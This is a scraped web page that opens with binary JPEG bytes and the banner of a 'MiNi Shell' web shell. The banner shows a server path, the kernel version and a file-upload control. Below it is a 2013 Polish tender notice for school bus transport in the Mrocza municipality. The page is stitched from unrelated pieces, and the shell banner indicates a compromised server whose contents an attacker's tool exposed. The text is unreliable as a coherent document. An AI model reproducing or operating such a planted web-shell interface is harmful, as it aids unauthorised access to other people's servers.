JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130520/195674-N-2013.html

<p class="kh_header"><b>Mrocza: Przewóz dzieci do szkół w roku szkolnym 2013/2014</b><br>
<b>Numer ogłoszenia: 195674 - 2013; data zamieszczenia: 20.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Obsługi Oświaty w Mroczy , Plac 1 Maja 9, 89-115 Mrocza, woj. kujawsko-pomorskie, tel. 52 3856359, faks 52 3227259.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.mrocza.pl ( zakładka Gminny Zespół Obsługi Oświaty w Mroczy)</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewóz dzieci do szkół w roku szkolnym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Przewóz dzieci do szkół w roku szkolnym 2013 2014. Część I zamówienia: Przewóz uczniów do i ze: SP w Mroczy i Witosławiu, Gimnazjum w Mroczy oraz oddziału przedszkolnego Przedszkola Miejskiego w Mroczy.
PRZYWOZY TRASA ILOŚĆ UCZNIÓW
Kosowo - Mrocza 16
Krukówko - Mrocza 7
Drążno - Mrocza 25
Wyrza - Mrocza 33
Matyldzin - Mrocza 6
Rościmin - Witosław 32
Rościmin - Mrocza 14
Orle - Mrocza 5
Orlinek - Mrocza 23
Wiele - Mrocza 38
Konstantowo - Mrocza 10
Drzewianowo - Mrocza 69
Słupówko - Mrocza 10
Ostrowo - Mrocza 25
Razem 313
ODWOZY I TRASA ILOŚĆ UCZNIÓW
Kosowo - Mrocza 2 
Wyrza - Mrocza 12
Matyldzin - Mrocza 5
Rościmin - Witosław 5
Orlinek - Mrocza 12
Wiele - Mrocza 17
Konstantowo - Mrocza 8
Drzewianowo - Mrocza 24
Słupówko - Mrocza 6
Ostrowo - Mrocza 17
RAZEM: 108
ODWOZY II TRASA ILOŚĆ UCZNIÓW
Kosowo - Mrocza 14
Krukówko - Mrocza 7
Samsieczynek - Mrocza 8x0,5
Drążno - Mrocza 25
Drążonek - Mrocza 11x0,5
Wyrza - Mrocza 21
Matyldzin - Mrocza 1
Rościmin - Witosław 27
Rościmin - Mrocza 14
Witosław - Mrocza 47x0,5
Orle - Mrocza 5 i 3x0,5
Orlinek - Mrocza 11
Wiele - Mrocza 21
Konstantowo - Mrocza 2
Drzewianowo - Mrocza 45
Słupówko - Mrocza 4
Ostrowo - Mrocza 8
RAZEM: 274
TRASA Ilość opiekunów
nad uczniami oddziałów 0 i 6-letnich w kl. I
Kosowo - Mrocza 1
Wyrza - Mrocza 9
Matyldzin - Mrocza 2
Rościmin - Witosław 5
Orlinek - Mrocza 3
Wiele - Mrocza 1
Drzewianowo - Mrocza 14
Ostrowo - Mrocza 1
RAZEM: 36
Przywóz 281 uczniów dotyczy dowozu uczniów z poszczególnych miejscowości do Mroczy na godz. 805 (rozpoczęcie zajęć lekcyjnych w Szkole Podstawowej w Mroczy, Gimnazjum im. Jana Pawła II w Mroczy oraz w oddziale przedszkolnym Przedszkola Miejskiego w Mroczy o  godz. 815 )
Przywóz 32 uczniów z Rościmina do Szkoły Podstawowej im. A. Mickiewicza w Witosławiu na godz. 740 (rozpoczęcie zajęć lekcyjnych w Szkole Podstawowej im. A. Mickiewicza w Witosławiu o godz. 750).

Odwozy uczniów dotyczą:

a) pierwsze odwozy (I) w poszczególnych kierunkach między godz.1200 a 1315 obejmują dzieci oddziałów 0 i uczniów klas I-III Szkoły Podstawowej w Mroczy, Szkoły Podstawowej w Witosławiu z miejscowości Rościmin i dzieci uczęszczających do oddziału przedszkolnego Przedszkola Miejskiego w Mroczy,

b) drugie odwozy (II) w poszczególnych kierunkach między godz. 1400 a 1530 obejmują uczniów klas IV-VI Szkoły Podstawowej w Mroczy, Szkoły Podstawowej w Witosławiu z miejscowości Rościmin i uczniów klas I-III Gimnazjum,

c) w niektóre dni tygodnia, w zależności od sporządzonych planów lekcyjnych szkół liczba uczniów w pierwszym i drugim odwozie może ulec zmianie (uczniowie klas IV-VI Szkół Podstawowych i klas I-III Gimnazjum kończą zajęcia w godz. między 1200 a 1315, lub nieliczni uczniowie klas I-III Szkół Podstawowych zostają na dodatkowych zajęciach).

Podane liczby uczniów do przewozu są liczbami szacunkowymi i mogą ulec zmianie w trakcie wykonywania umowy. 

CZĘŚĆ II ZAMÓWIENIA 
Przewóz uczniów do i ze SP w Mroczy, Gimnazjum z miejscowości: Drążno, Drążonek, Samsieczynek.
Trasa PRZYWÓZ
Samsieczynek - Mrocza 15
Drążonek - Mrocza 19
Drążno - Mrocza 19
RAZEM: 53
Trasa ODWÓZ I 
Mrocza - Drążonek - Samsieczynek 15
Mrocza - Drążno 19
RAZEM: 34
Trasa ODWÓZ I I
Drążno - Drążonek 11

Przywóz 53 uczniów dotyczy dowozu uczniów z poszczególnych miejscowości do Mroczy na godz. 805 (rozpoczęcie zajęć lekcyjnych w Szkole Podstawowej w Mroczy, Gimnazjum im. Jana Pawła II w Mroczy o godz. 815 ).
Dzienna długość tras obejmujących przywóz i odwóz stanowi 48 km.
Przewoźnik w ramach świadczonej usługi zapewnia opiekę nad uczniami w czasie dowozu. Koszt opieki nad uczniami w czasie dowozu wkalkulowany jest w ostateczną cenę oferty.
Podane liczby uczniów do przewozu są liczbami szacunkowymi i mogą ulec zmianie w trakcie wykonywania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 60.10.00.00-9, 60.17.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzone na załączniku do SIWZ oraz aktualną licencję na wykonywanie krajowego transportu drogowego osób; 
Ocena spełnienia warunku nastąpi na podstawie załączonych do oferty ww. dokumentów na zasadzie spełnia/nie spełnia. Zamawiający uzna wyżej wymieniony warunek za spełniony jeżeli Wykonawca wykaże się posiadaniem uprawnień - aktualną licencją na wykonywanie krajowego transportu drogowego osób na okres obejmujący termin wykonywania zadania oraz złoży oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzone na załączniku nr 1 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzone na załączniku do SIWZ oraz wykaże, że w okresie ostatnich trzech lat przed dniem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie minimum 2 usługi o charakterze i złożoności porównywalnej z zakresem zadania tj. przewóz uczniów do szkół przez okres co najmniej 10 - ciu miesięcy.
Ocena spełnienia warunku nastąpi na podstawie załączonych do oferty ww. dokumentów na zasadzie spełnia/nie spełnia. Na potwierdzenie spełniania warunku Wykonawca składa wypełniony i podpisany Wykaz usług - załącznik nr 6 do SIWZ wraz z dokumentami potwierdzającymi, że usługa została wykonane należycie i oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzone na załączniku nr 1 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzone na załączniku Nr 1 do SIWZ oraz wykaże dokument, że posiada środki transportu umożliwiające jednorazowo przewiezienie podane w SIWZ ilości uczniów z poszczególnych miejscowości - zgodnie z przedmiotem zamówienia. 
Ocena spełnienia warunku nastąpi na podstawie załączonych do oferty ww. dokumentów na zasadzie spełnia/nie spełnia. Na potwierdzenie spełniania warunku Wykonawca składa wypełniony i podpisany wykaz sprzętu niezbędnego do realizacji zamówienia - załącznik nr 5 do SIWZ, oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzone na załączniku nr 1 do SIWZ oraz dokument, że posiada środki transportu umożliwiające jednorazowo przewiezienie podane w SIWZ ilości uczniów z poszczególnych miejscowości. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które w dniu przystąpienia do realizacji zadania będą posiadać uprawnienia do kierowania pojazdami silnikowymi kat.D.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na potwierdzenie spełniania warunku Wykonawca składa Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia - wypełniony i podpisany załącznik nr 3 do SIWZ, oświadczenie, że osoby posiadają wymagane uprawnienia - wypełniony i podpisany załącznik nr 4 do SIWZ, oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzone na załączniku nr 1 do SIWZ oraz dokument - uprawnienia do kierowania pojazdami silnikowymi kat.D. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej umożliwiającej wykonanie przedmiotu zamówienia, Wykonawca wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na potwierdzenie spełniania warunku Wykonawca składa polisę a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzone na załączniku nr 1 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla Zamawiającego postanowienia, które zostaną wprowadzone do treści zawieranej umowy oraz wysokość kar umownych z tytułu niewykonania lub nienależytego wykonania umowy zawiera  (załącznik - projekt umowy).
Zamawiający ustala, iż zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem art.144 ust.1 ustawy, może mieć również miejsce w następujących sytuacjach:
1) przesunięcia terminu prowadzenia zajęć szkolnych;
2) zmiana liczby przewożonych dzieci;
3) działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia;
4) konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego;
5) wystąpienia utrudnień w ruchu z powodu robót drogowych, których nie można było przewidzieć w chwili zawarcia umowy;
6) wystąpienia takich warunków atmosferycznych, które ze względów obiektywnych uniemożliwiają wykonanie usługi zgodnie ze specyfikacją istotnych warunków zamówienia;
7) w przypadku zmiany ustawy z dnia 11 marca 2004 r. o podatku od towarów i usług (t.j. Dz.U z 2011 r. Nr 177, poz. 1054 ze zm.) oraz przepisów wykonawczych do tej ustawy, mających wpływ na zmianę stawki podatku VAT. 
Powyższe zmiany dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mrocza.pl ( zakładka Gminny Zespół Obsługi Oświaty w Mroczy)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Obsługi Oświaty 
ul. Plac 1 Maja 9
89-115 Mrocza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 09:00, miejsce: Gminny Zespół Obsługi Oświaty 
ul. Plac 1 Maja 9
89-115 Mrocza
pok.nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przewóz uczniów do i ze: SP w Mroczy i Witosławiu, Gimnazjum w Mroczy oraz oddziału przedszkolnego Przedszkola Miejskiego w Mroczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przewóz uczniów do i ze: SP w Mroczy i Witosławiu, Gimnazjum w Mroczy oraz oddziału przedszkolnego Przedszkola Miejskiego w Mroczy. 
PRZYWOZY 
Kosowo - Mrocza 16
Krukówko - Mrocza 7
Drążno - Mrocza 25
Wyrza - Mrocza 33
Matyldzin - Mrocza 6
Rościmin - Witosław 32
Rościmin - Mrocza 14
Orle - Mrocza 5
Orlinek - Mrocza 23
Wiele - Mrocza 38
Konstantowo - Mrocza 10
Drzewianowo - Mrocza 69
Słupówko - Mrocza 10
Ostrowo - Mrocza 25
Razem: 313
ODWOZY I TRASA ILOŚĆ UCZNIÓW
Kosowo - Mrocza 2 
Wyrza - Mrocza 12
Matyldzin - Mrocza 5
Rościmin - Witosław 5
Orlinek - Mrocza 12
Wiele - Mrocza 17
Konstantowo - Mrocza 8
Drzewianowo - Mrocza 24
Słupówko - Mrocza 6
Ostrowo - Mrocza 17
RAZEM: 108
ODWOZY II TRASA ILOŚĆ UCZNIÓW
Kosowo - Mrocza 14
Krukówko - Mrocza 7
Samsieczynek - Mrocza 8x0,5
Drążno - Mrocza 25
Drążonek - Mrocza 11x0,5
Wyrza - Mrocza 21
Matyldzin - Mrocza 1
Rościmin - Witosław 27
Rościmin - Mrocza 14
Witosław - Mrocza 47x0,5
Orle - Mrocza 5 i 3x0,5
Orlinek - Mrocza 11
Wiele - Mrocza 21
Konstantowo - Mrocza 2
Drzewianowo - Mrocza 45
Słupówko - Mrocza 4
Ostrowo - Mrocza 8
RAZEM: 274
TRASA Ilość opiekunów
nad uczniami oddziałów 0 i 6-letnich w kl. I
Kosowo - Mrocza 1
Wyrza - Mrocza 9
Matyldzin - Mrocza 2
Rościmin - Witosław 5
Orlinek - Mrocza 3
Wiele - Mrocza 1
Drzewianowo - Mrocza 14
Ostrowo - Mrocza 1
RAZEM: 36

Przywóz 281 uczniów dotyczy dowozu uczniów z poszczególnych miejscowości do Mroczy na godz. 805 (rozpoczęcie zajęć lekcyjnych w Szkole Podstawowej w Mroczy, Gimnazjum im. Jana Pawła II w Mroczy oraz w oddziale przedszkolnym Przedszkola Miejskiego w Mroczy o  godz. 815 )
